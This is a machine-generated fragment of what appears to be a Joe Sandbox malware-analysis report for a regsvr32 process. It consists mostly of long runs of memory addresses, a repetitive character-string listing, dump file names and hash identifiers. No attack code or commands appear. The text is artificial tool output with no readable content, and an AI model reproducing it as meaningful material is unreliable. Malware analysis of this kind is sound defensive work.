                                                                                                        0x7ffc123e8017
                                                                                                        0x7ffc123e801f
                                                                                                        0x7ffc123e8027
                                                                                                        0x7ffc123e802f
                                                                                                        0x7ffc123e8037
                                                                                                        0x7ffc123e803f
                                                                                                        0x7ffc123e8047
                                                                                                        0x7ffc123e804f
                                                                                                        0x7ffc123e8057
                                                                                                        0x7ffc123e805f
                                                                                                        0x7ffc123e8067
                                                                                                        0x7ffc123e806f
                                                                                                        0x7ffc123e8077
                                                                                                        0x7ffc123e807f
                                                                                                        0x7ffc123e8087
                                                                                                        0x7ffc123e808f
                                                                                                        0x7ffc123e8097
                                                                                                        0x7ffc123e809f
                                                                                                        0x7ffc123e80a7
                                                                                                        0x7ffc123e80af
                                                                                                        0x7ffc123e80b7
                                                                                                        0x7ffc123e80bf
                                                                                                        0x7ffc123e80c7
                                                                                                        0x7ffc123e80cf
                                                                                                        0x7ffc123e80d7
                                                                                                        0x7ffc123e80df
                                                                                                        0x7ffc123e80e7
                                                                                                        0x7ffc123e80ef
                                                                                                        0x7ffc123e80f7
                                                                                                        0x7ffc123e80ff
                                                                                                        0x7ffc123e8107
                                                                                                        0x7ffc123e810f
                                                                                                        0x7ffc123e8117
                                                                                                        0x7ffc123e811f
                                                                                                        0x7ffc123e8127
                                                                                                        0x7ffc123e812f
                                                                                                        0x7ffc123e8137
                                                                                                        0x7ffc123e813f
                                                                                                        0x7ffc123e8147
                                                                                                        0x7ffc123e814f
                                                                                                        0x7ffc123e8157
                                                                                                        0x7ffc123e815f
                                                                                                        0x7ffc123e8167
                                                                                                        0x7ffc123e816f
                                                                                                        0x7ffc123e8177
                                                                                                        0x7ffc123e817f
                                                                                                        0x7ffc123e8187
                                                                                                        0x7ffc123e818f
                                                                                                        0x7ffc123e8197
                                                                                                        0x7ffc123e819f
                                                                                                        0x7ffc123e81a7
                                                                                                        0x7ffc123e81af
                                                                                                        0x7ffc123e81b7
                                                                                                        0x7ffc123e81bf
                                                                                                        0x7ffc123e81c7
                                                                                                        0x7ffc123e81cf
                                                                                                        0x7ffc123e81d7
                                                                                                        0x7ffc123e81df
                                                                                                        0x7ffc123e81e7
                                                                                                        0x7ffc123e81ef
                                                                                                        0x7ffc123e81f7
                                                                                                        0x7ffc123e81ff
                                                                                                        0x7ffc123e8207
                                                                                                        0x7ffc123e820f
                                                                                                        0x7ffc123e8217
                                                                                                        0x7ffc123e821f
                                                                                                        0x7ffc123e8227
                                                                                                        0x7ffc123e822f
                                                                                                        0x7ffc123e8237
                                                                                                        0x7ffc123e823f
                                                                                                        0x7ffc123e8247
                                                                                                        0x7ffc123e824f
                                                                                                        0x7ffc123e8257
                                                                                                        0x7ffc123e825f
                                                                                                        0x7ffc123e8267
                                                                                                        0x7ffc123e826f
                                                                                                        0x7ffc123e8277
                                                                                                        0x7ffc123e827f
                                                                                                        0x7ffc123e8287
                                                                                                        0x7ffc123e828f
                                                                                                        0x7ffc123e8297
                                                                                                        0x7ffc123e829f
                                                                                                        0x7ffc123e82a7
                                                                                                        0x7ffc123e82af
                                                                                                        0x7ffc123e82b7
                                                                                                        0x7ffc123e82bf
                                                                                                        0x7ffc123e82c7
                                                                                                        0x7ffc123e82cf
                                                                                                        0x7ffc123e82d7
                                                                                                        0x7ffc123e82df
                                                                                                        0x7ffc123e82e7
                                                                                                        0x7ffc123e82ef
                                                                                                        0x7ffc123e82f7
                                                                                                        0x7ffc123e82ff
                                                                                                        0x7ffc123e8307
                                                                                                        0x7ffc123e830f
                                                                                                        0x7ffc123e8317
                                                                                                        0x7ffc123e831f
                                                                                                        0x7ffc123e8327
                                                                                                        0x7ffc123e832f
                                                                                                        0x7ffc123e8337
                                                                                                        0x7ffc123e833f
                                                                                                        0x7ffc123e8347
                                                                                                        0x7ffc123e834f
                                                                                                        0x7ffc123e8357
                                                                                                        0x7ffc123e835f
                                                                                                        0x7ffc123e8367
                                                                                                        0x7ffc123e836f
                                                                                                        0x7ffc123e8377
                                                                                                        0x7ffc123e837f
                                                                                                        0x7ffc123e8387
                                                                                                        0x7ffc123e838f
                                                                                                        0x7ffc123e8397
                                                                                                        0x7ffc123e839f
                                                                                                        0x7ffc123e83a7
                                                                                                        0x7ffc123e83af
                                                                                                        0x7ffc123e83b7
                                                                                                        0x7ffc123e83bf
                                                                                                        0x7ffc123e83c7
                                                                                                        0x7ffc123e83cf
                                                                                                        0x7ffc123e83d7
                                                                                                        0x7ffc123e83df
                                                                                                        0x7ffc123e83e7
                                                                                                        0x7ffc123e83ef
                                                                                                        0x7ffc123e83f7
                                                                                                        0x7ffc123e83ff
                                                                                                        0x7ffc123e8407
                                                                                                        0x7ffc123e840f
                                                                                                        0x7ffc123e8417
                                                                                                        0x7ffc123e841f
                                                                                                        0x7ffc123e8427
                                                                                                        0x7ffc123e842f
                                                                                                        0x7ffc123e8437
                                                                                                        0x7ffc123e843f
                                                                                                        0x7ffc123e8447
                                                                                                        0x7ffc123e844f
                                                                                                        0x7ffc123e8457
                                                                                                        0x7ffc123e845f
                                                                                                        0x7ffc123e8467
                                                                                                        0x7ffc123e846f
                                                                                                        0x7ffc123e8477
                                                                                                        0x7ffc123e847f
                                                                                                        0x7ffc123e8487
                                                                                                        0x7ffc123e848f
                                                                                                        0x7ffc123e8497
                                                                                                        0x7ffc123e849f
                                                                                                        0x7ffc123e84a7
                                                                                                        0x7ffc123e84af
                                                                                                        0x7ffc123e84b7
                                                                                                        0x7ffc123e84bf
                                                                                                        0x7ffc123e84c7
                                                                                                        0x7ffc123e84cf
                                                                                                        0x7ffc123e84d7
                                                                                                        0x7ffc123e84df
                                                                                                        0x7ffc123e84e7
                                                                                                        0x7ffc123e84ef
                                                                                                        0x7ffc123e84f7
                                                                                                        0x7ffc123e84ff
                                                                                                        0x7ffc123e8507
                                                                                                        0x7ffc123e850f
                                                                                                        0x7ffc123e8517
                                                                                                        0x7ffc123e851f
                                                                                                        0x7ffc123e8527
                                                                                                        0x7ffc123e852f
                                                                                                        0x7ffc123e8537
                                                                                                        0x7ffc123e853f
                                                                                                        0x7ffc123e8547
                                                                                                        0x7ffc123e854f
                                                                                                        0x7ffc123e8557
                                                                                                        0x7ffc123e855f
                                                                                                        0x7ffc123e8567
                                                                                                        0x7ffc123e856f
                                                                                                        0x7ffc123e8577
                                                                                                        0x7ffc123e857f
                                                                                                        0x7ffc123e8587
                                                                                                        0x7ffc123e858f
                                                                                                        0x7ffc123e8597
                                                                                                        0x7ffc123e859f
                                                                                                        0x7ffc123e85a7
                                                                                                        0x7ffc123e85af
                                                                                                        0x7ffc123e85b7
                                                                                                        0x7ffc123e85bf
                                                                                                        0x7ffc123e85c7
                                                                                                        0x7ffc123e85cf
                                                                                                        0x7ffc123e85d7
                                                                                                        0x7ffc123e85df
                                                                                                        0x7ffc123e85e7
                                                                                                        0x7ffc123e85ef
                                                                                                        0x7ffc123e85f7
                                                                                                        0x7ffc123e85ff
                                                                                                        0x7ffc123e8607
                                                                                                        0x7ffc123e860f
                                                                                                        0x7ffc123e8617
                                                                                                        0x7ffc123e861f
                                                                                                        0x7ffc123e8627
                                                                                                        0x7ffc123e862f
                                                                                                        0x7ffc123e8637
                                                                                                        0x7ffc123e863f
                                                                                                        0x7ffc123e8647
                                                                                                        0x7ffc123e864f
                                                                                                        0x7ffc123e8657
                                                                                                        0x7ffc123e865f
                                                                                                        0x7ffc123e8667
                                                                                                        0x7ffc123e866f
                                                                                                        0x7ffc123e8677
                                                                                                        0x7ffc123e867f
                                                                                                        0x7ffc123e8687
                                                                                                        0x7ffc123e868f
                                                                                                        0x7ffc123e8697
                                                                                                        0x7ffc123e869f
                                                                                                        0x7ffc123e86a7
                                                                                                        0x7ffc123e86af
                                                                                                        0x7ffc123e86b7
                                                                                                        0x7ffc123e86bf
                                                                                                        0x7ffc123e86c7
                                                                                                        0x7ffc123e86cf
                                                                                                        0x7ffc123e86d7
                                                                                                        0x7ffc123e86df
                                                                                                        0x7ffc123e86e7
                                                                                                        0x7ffc123e86ef
                                                                                                        0x7ffc123e86f7
                                                                                                        0x7ffc123e86ff
                                                                                                        0x7ffc123e8707
                                                                                                        0x7ffc123e870f
                                                                                                        0x7ffc123e8717
                                                                                                        0x7ffc123e871f
                                                                                                        0x7ffc123e8727
                                                                                                        0x7ffc123e872f
                                                                                                        0x7ffc123e8737
                                                                                                        0x7ffc123e873f
                                                                                                        0x7ffc123e8747
                                                                                                        0x7ffc123e874f
                                                                                                        0x7ffc123e8757
                                                                                                        0x7ffc123e875f
                                                                                                        0x7ffc123e8767
                                                                                                        0x7ffc123e876f
                                                                                                        0x7ffc123e8777
                                                                                                        0x7ffc123e877f
                                                                                                        0x7ffc123e8787
                                                                                                        0x7ffc123e878f
                                                                                                        0x7ffc123e8797
                                                                                                        0x7ffc123e879f
                                                                                                        0x7ffc123e87a7
                                                                                                        0x7ffc123e87af
                                                                                                        0x7ffc123e87b7
                                                                                                        0x7ffc123e87bf
                                                                                                        0x7ffc123e87c7
                                                                                                        0x7ffc123e87cf
                                                                                                        0x7ffc123e87d7
                                                                                                        0x7ffc123e87df
                                                                                                        0x7ffc123e87e7
                                                                                                        0x7ffc123e87ef
                                                                                                        0x7ffc123e87f7
                                                                                                        0x7ffc123e87ff
                                                                                                        0x7ffc123e8807
                                                                                                        0x7ffc123e880f
                                                                                                        0x7ffc123e8817
                                                                                                        0x7ffc123e881f
                                                                                                        0x7ffc123e8827
                                                                                                        0x7ffc123e882f
                                                                                                        0x7ffc123e8837
                                                                                                        0x7ffc123e883f
                                                                                                        0x7ffc123e8847
                                                                                                        0x7ffc123e884f
                                                                                                        0x7ffc123e8857
                                                                                                        0x7ffc123e885f
                                                                                                        0x7ffc123e8867
                                                                                                        0x7ffc123e886f
                                                                                                        0x7ffc123e8877
                                                                                                        0x7ffc123e887f
                                                                                                        0x7ffc123e8887
                                                                                                        0x7ffc123e888f
                                                                                                        0x7ffc123e8897
                                                                                                        0x7ffc123e889f
                                                                                                        0x7ffc123e88a7
                                                                                                        0x7ffc123e88af
                                                                                                        0x7ffc123e88b7
                                                                                                        0x7ffc123e88bf
                                                                                                        0x7ffc123e88c7
                                                                                                        0x7ffc123e88cf
                                                                                                        0x7ffc123e88d7
                                                                                                        0x7ffc123e88df
                                                                                                        0x7ffc123e88e7
                                                                                                        0x7ffc123e88ef
                                                                                                        0x7ffc123e88f7
                                                                                                        0x7ffc123e88ff
                                                                                                        0x7ffc123e8907
                                                                                                        0x7ffc123e890f
                                                                                                        0x7ffc123e8917
                                                                                                        0x7ffc123e891f
                                                                                                        0x7ffc123e8927
                                                                                                        0x7ffc123e892f
                                                                                                        0x7ffc123e8937
                                                                                                        0x7ffc123e893f
                                                                                                        0x7ffc123e8947
                                                                                                        0x7ffc123e894f
                                                                                                        0x7ffc123e8957
                                                                                                        0x7ffc123e895f
                                                                                                        0x7ffc123e8967
                                                                                                        0x7ffc123e896f
                                                                                                        0x7ffc123e8977
                                                                                                        0x7ffc123e897f
                                                                                                        0x7ffc123e8987
                                                                                                        0x7ffc123e898f
                                                                                                        0x7ffc123e8997
                                                                                                        0x7ffc123e899f
                                                                                                        0x7ffc123e89a7
                                                                                                        0x7ffc123e89af
                                                                                                        0x7ffc123e89b7
                                                                                                        0x7ffc123e89bf
                                                                                                        0x7ffc123e89c7
                                                                                                        0x7ffc123e89cf
                                                                                                        0x7ffc123e89d7
                                                                                                        0x7ffc123e89df
                                                                                                        0x7ffc123e89e7
                                                                                                        0x7ffc123e89ef
                                                                                                        0x7ffc123e89f7
                                                                                                        0x7ffc123e89ff
                                                                                                        0x7ffc123e8a07
                                                                                                        0x7ffc123e8a0f
                                                                                                        0x7ffc123e8a17
                                                                                                        0x7ffc123e8a1f
                                                                                                        0x7ffc123e8a27
                                                                                                        0x7ffc123e8a2f
                                                                                                        0x7ffc123e8a37
                                                                                                        0x7ffc123e8a3f
                                                                                                        0x7ffc123e8a47
                                                                                                        0x7ffc123e8a4f
                                                                                                        0x7ffc123e8a57
                                                                                                        0x7ffc123e8a5f
                                                                                                        0x7ffc123e8a67
                                                                                                        0x7ffc123e8a6f
                                                                                                        0x7ffc123e8a77
                                                                                                        0x7ffc123e8a7f
                                                                                                        0x7ffc123e8a87
                                                                                                        0x7ffc123e8a8f
                                                                                                        0x7ffc123e8a97
                                                                                                        0x7ffc123e8a9f
                                                                                                        0x7ffc123e8aa7
                                                                                                        0x7ffc123e8aaf
                                                                                                        0x7ffc123e8ab7
                                                                                                        0x7ffc123e8abf
                                                                                                        0x7ffc123e8ac7
                                                                                                        0x7ffc123e8acf
                                                                                                        0x7ffc123e8ad7
                                                                                                        0x7ffc123e8adf
                                                                                                        0x7ffc123e8ae7
                                                                                                        0x7ffc123e8aef
                                                                                                        0x7ffc123e8af7
                                                                                                        0x7ffc123e8aff
                                                                                                        0x7ffc123e8b07
                                                                                                        0x7ffc123e8b0f
                                                                                                        0x7ffc123e8b17
                                                                                                        0x7ffc123e8b1f
                                                                                                        0x7ffc123e8b27
                                                                                                        0x7ffc123e8b2f
                                                                                                        0x7ffc123e8b37
                                                                                                        0x7ffc123e8b3f
                                                                                                        0x7ffc123e8b47
                                                                                                        0x7ffc123e8b4f
                                                                                                        0x7ffc123e8b57
                                                                                                        0x7ffc123e8b5f
                                                                                                        0x7ffc123e8b67
                                                                                                        0x7ffc123e8b6f
                                                                                                        0x7ffc123e8b77
                                                                                                        0x7ffc123e8b7f
                                                                                                        0x7ffc123e8b87
                                                                                                        0x7ffc123e8b8f
                                                                                                        0x7ffc123e8b97
                                                                                                        0x7ffc123e8b9f
                                                                                                        0x7ffc123e8ba7
                                                                                                        0x7ffc123e8baf
                                                                                                        0x7ffc123e8bb7
                                                                                                        0x7ffc123e8bbf
                                                                                                        0x7ffc123e8bc7
                                                                                                        0x7ffc123e8bcf
                                                                                                        0x7ffc123e8bd7
                                                                                                        0x7ffc123e8bdf
                                                                                                        0x7ffc123e8be7
                                                                                                        0x7ffc123e8bef
                                                                                                        0x7ffc123e8bf7
                                                                                                        0x7ffc123e8bff
                                                                                                        0x7ffc123e8c07
                                                                                                        0x7ffc123e8c0f
                                                                                                        0x7ffc123e8c17
                                                                                                        0x7ffc123e8c1f
                                                                                                        0x7ffc123e8c27
                                                                                                        0x7ffc123e8c2f
                                                                                                        0x7ffc123e8c37
                                                                                                        0x7ffc123e8c3f
                                                                                                        0x7ffc123e8c47
                                                                                                        0x7ffc123e8c4f
                                                                                                        0x7ffc123e8c57
                                                                                                        0x7ffc123e8c5f
                                                                                                        0x7ffc123e8c67
                                                                                                        0x7ffc123e8c6f
                                                                                                        0x7ffc123e8c77
                                                                                                        0x7ffc123e8c7f
                                                                                                        0x7ffc123e8c87
                                                                                                        0x7ffc123e8c8f
                                                                                                        0x7ffc123e8c97
                                                                                                        0x7ffc123e8c9f
                                                                                                        0x7ffc123e8ca7
                                                                                                        0x7ffc123e8caf
                                                                                                        0x7ffc123e8cb7
                                                                                                        0x7ffc123e8cbf
                                                                                                        0x7ffc123e8cc7
                                                                                                        0x7ffc123e8ccf
                                                                                                        0x7ffc123e8cd7
                                                                                                        0x7ffc123e8cdf
                                                                                                        0x7ffc123e8ce7
                                                                                                        0x7ffc123e8cef
                                                                                                        0x7ffc123e8cf7
                                                                                                        0x7ffc123e8cff
                                                                                                        0x7ffc123e8d07
                                                                                                        0x7ffc123e8d0f
                                                                                                        0x7ffc123e8d17
                                                                                                        0x7ffc123e8d1f
                                                                                                        0x7ffc123e8d27
                                                                                                        0x7ffc123e8d2f
                                                                                                        0x7ffc123e8d37
                                                                                                        0x7ffc123e8d3f
                                                                                                        0x7ffc123e8d47
                                                                                                        0x7ffc123e8d4f
                                                                                                        0x7ffc123e8d57
                                                                                                        0x7ffc123e8d5f
                                                                                                        0x7ffc123e8d67
                                                                                                        0x7ffc123e8d6f
                                                                                                        0x7ffc123e8d77
                                                                                                        0x7ffc123e8d7f
                                                                                                        0x7ffc123e8d87
                                                                                                        0x7ffc123e8d8f
                                                                                                        0x7ffc123e8d97
                                                                                                        0x7ffc123e8d9f
                                                                                                        0x7ffc123e8da7
                                                                                                        0x7ffc123e8daf
                                                                                                        0x7ffc123e8db7
                                                                                                        0x7ffc123e8dbf
                                                                                                        0x7ffc123e8dc7
                                                                                                        0x7ffc123e8dcf
                                                                                                        0x7ffc123e8dd7
                                                                                                        0x7ffc123e8ddf
                                                                                                        0x7ffc123e8de7
                                                                                                        0x7ffc123e8def
                                                                                                        0x7ffc123e8df7
                                                                                                        0x7ffc123e8dff
                                                                                                        0x7ffc123e8e07
                                                                                                        0x7ffc123e8e0f
                                                                                                        0x7ffc123e8e17
                                                                                                        0x7ffc123e8e1f
                                                                                                        0x7ffc123e8e27
                                                                                                        0x7ffc123e8e2f
                                                                                                        0x7ffc123e8e37
                                                                                                        0x7ffc123e8e3f
                                                                                                        0x7ffc123e8e47
                                                                                                        0x7ffc123e8e4f
                                                                                                        0x7ffc123e8e57
                                                                                                        0x7ffc123e8e5f
                                                                                                        0x7ffc123e8e67
                                                                                                        0x7ffc123e8e6f
                                                                                                        0x7ffc123e8e77
                                                                                                        0x7ffc123e8e7f
                                                                                                        0x7ffc123e8e87
                                                                                                        0x7ffc123e8e8f
                                                                                                        0x7ffc123e8e97
                                                                                                        0x7ffc123e8e9f
                                                                                                        0x7ffc123e8ea7
                                                                                                        0x7ffc123e8eaf
                                                                                                        0x7ffc123e8eb7
                                                                                                        0x7ffc123e8ebf
                                                                                                        0x7ffc123e8ec7
                                                                                                        0x7ffc123e8ecf
                                                                                                        0x7ffc123e8ed7
                                                                                                        0x7ffc123e8edf
                                                                                                        0x7ffc123e8ee7
                                                                                                        0x7ffc123e8eef
                                                                                                        0x7ffc123e8ef7
                                                                                                        0x7ffc123e8eff
                                                                                                        0x7ffc123e8f07
                                                                                                        0x7ffc123e8f0f
                                                                                                        0x7ffc123e8f17
                                                                                                        0x7ffc123e8f1f
                                                                                                        0x7ffc123e8f27
                                                                                                        0x7ffc123e8f2f
                                                                                                        0x7ffc123e8f37
                                                                                                        0x7ffc123e8f3f
                                                                                                        0x7ffc123e8f47
                                                                                                        0x7ffc123e8f4f
                                                                                                        0x7ffc123e8f57
                                                                                                        0x7ffc123e8f5f
                                                                                                        0x7ffc123e8f67
                                                                                                        0x7ffc123e8f6f
                                                                                                        0x7ffc123e8f77
                                                                                                        0x7ffc123e8f7f
                                                                                                        0x7ffc123e8f87
                                                                                                        0x7ffc123e8f8f
                                                                                                        0x7ffc123e8f97
                                                                                                        0x7ffc123e8f9f
                                                                                                        0x7ffc123e8fa7
                                                                                                        0x7ffc123e8faf
                                                                                                        0x7ffc123e8fb7
                                                                                                        0x7ffc123e8fbf
                                                                                                        0x7ffc123e8fc7
                                                                                                        0x7ffc123e8fcf
                                                                                                        0x7ffc123e8fd7
                                                                                                        0x7ffc123e8fdf
                                                                                                        0x7ffc123e8fe7
                                                                                                        0x7ffc123e8fef
                                                                                                        0x7ffc123e8ff7
                                                                                                        0x7ffc123e8fff
                                                                                                        0x7ffc123e9007
                                                                                                        0x7ffc123e900f
                                                                                                        0x7ffc123e9017
                                                                                                        0x7ffc123e901f
                                                                                                        0x7ffc123e9027
                                                                                                        0x7ffc123e902f
                                                                                                        0x7ffc123e9037
                                                                                                        0x7ffc123e903f
                                                                                                        0x7ffc123e9047
                                                                                                        0x7ffc123e904f
                                                                                                        0x7ffc123e9057
                                                                                                        0x7ffc123e905f
                                                                                                        0x7ffc123e9067
                                                                                                        0x7ffc123e906f
                                                                                                        0x7ffc123e9077
                                                                                                        0x7ffc123e907f
                                                                                                        0x7ffc123e9087
                                                                                                        0x7ffc123e908f
                                                                                                        0x7ffc123e9097
                                                                                                        0x7ffc123e909f
                                                                                                        0x7ffc123e90a7
                                                                                                        0x7ffc123e90af
                                                                                                        0x7ffc123e90b7
                                                                                                        0x7ffc123e90bf
                                                                                                        0x7ffc123e90c7
                                                                                                        0x7ffc123e90cf
                                                                                                        0x7ffc123e90d7
                                                                                                        0x7ffc123e90df
                                                                                                        0x7ffc123e90e7
                                                                                                        0x7ffc123e90ef
                                                                                                        0x7ffc123e90f7
                                                                                                        0x7ffc123e90ff
                                                                                                        0x7ffc123e9107
                                                                                                        0x7ffc123e910f
                                                                                                        0x7ffc123e9117
                                                                                                        0x7ffc123e911f
                                                                                                        0x7ffc123e9127
                                                                                                        0x7ffc123e912f
                                                                                                        0x7ffc123e9137
                                                                                                        0x7ffc123e913f
                                                                                                        0x7ffc123e9147
                                                                                                        0x7ffc123e914f
                                                                                                        0x7ffc123e9157
                                                                                                        0x7ffc123e915f
                                                                                                        0x7ffc123e9167
                                                                                                        0x7ffc123e916f
                                                                                                        0x7ffc123e9177
                                                                                                        0x7ffc123e917f
                                                                                                        0x7ffc123e9187
                                                                                                        0x7ffc123e918f
                                                                                                        0x7ffc123e9197
                                                                                                        0x7ffc123e919f
                                                                                                        0x7ffc123e91a7
                                                                                                        0x7ffc123e91af
                                                                                                        0x7ffc123e91b7
                                                                                                        0x7ffc123e91bf
                                                                                                        0x7ffc123e91c7
                                                                                                        0x7ffc123e91cf
                                                                                                        0x7ffc123e91d7
                                                                                                        0x7ffc123e91df
                                                                                                        0x7ffc123e91e7
                                                                                                        0x7ffc123e91f8
                                                                                                        0x7ffc123e9200
                                                                                                        0x7ffc123e9205
                                                                                                        0x7ffc123e9212
                                                                                                        0x7ffc123e921a
                                                                                                        0x7ffc123e9224
                                                                                                        0x7ffc123e923e
                                                                                                        0x7ffc123e9240
                                                                                                        0x7ffc123e9248
                                                                                                        0x7ffc123e924a
                                                                                                        0x7ffc123e9257
                                                                                                        0x7ffc123e9263
                                                                                                        0x7ffc123e9270
                                                                                                        0x7ffc123e9275
                                                                                                        0x7ffc123e927c
                                                                                                        0x7ffc123e9287
                                                                                                        0x7ffc123e928e
                                                                                                        0x7ffc123e9294
                                                                                                        0x7ffc123e929d
                                                                                                        0x7ffc123e929f
                                                                                                        0x7ffc123e92a2
                                                                                                        0x7ffc123e92ae
                                                                                                        0x7ffc123e92b6
                                                                                                        0x7ffc123e92bb
                                                                                                        0x7ffc123e92d5
                                                                                                        0x7ffc123e92db
                                                                                                        0x7ffc123e92f5
                                                                                                        0x7ffc123e9303
                                                                                                        0x7ffc123e931e
                                                                                                        0x7ffc123e9320
                                                                                                        0x7ffc123e9328
                                                                                                        0x7ffc123e932d
                                                                                                        0x7ffc123e9330
                                                                                                        0x7ffc123e9342
                                                                                                        0x7ffc123e9358
                                                                                                        0x7ffc123e935f
                                                                                                        0x7ffc123e936a
                                                                                                        0x7ffc123e9370
                                                                                                        0x7ffc123e9372
                                                                                                        0x7ffc123e9380
                                                                                                        0x7ffc123e9382
                                                                                                        0x7ffc123e9391
                                                                                                        0x7ffc123e9396
                                                                                                        0x7ffc123e939e
                                                                                                        0x7ffc123e93a5
                                                                                                        0x7ffc123e93b8
                                                                                                        0x7ffc123e93bd
                                                                                                        0x7ffc123e93d0
                                                                                                        0x7ffc123e93d5
                                                                                                        0x7ffc123e93e1
                                                                                                        0x7ffc123e9401

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                                        • API String ID: 0-872547024
                                                                                                        • Opcode ID: cfa0254f3c6edf7987396e66ac259b01ab823acdf52d2d0fed8f3f6bc36bea99
                                                                                                        • Instruction ID: e990dfc24dcd993d6c5fcabd38f9682c1c58c6edc2ec7c4cd2650d3a35d29837
                                                                                                        • Opcode Fuzzy Hash: cfa0254f3c6edf7987396e66ac259b01ab823acdf52d2d0fed8f3f6bc36bea99
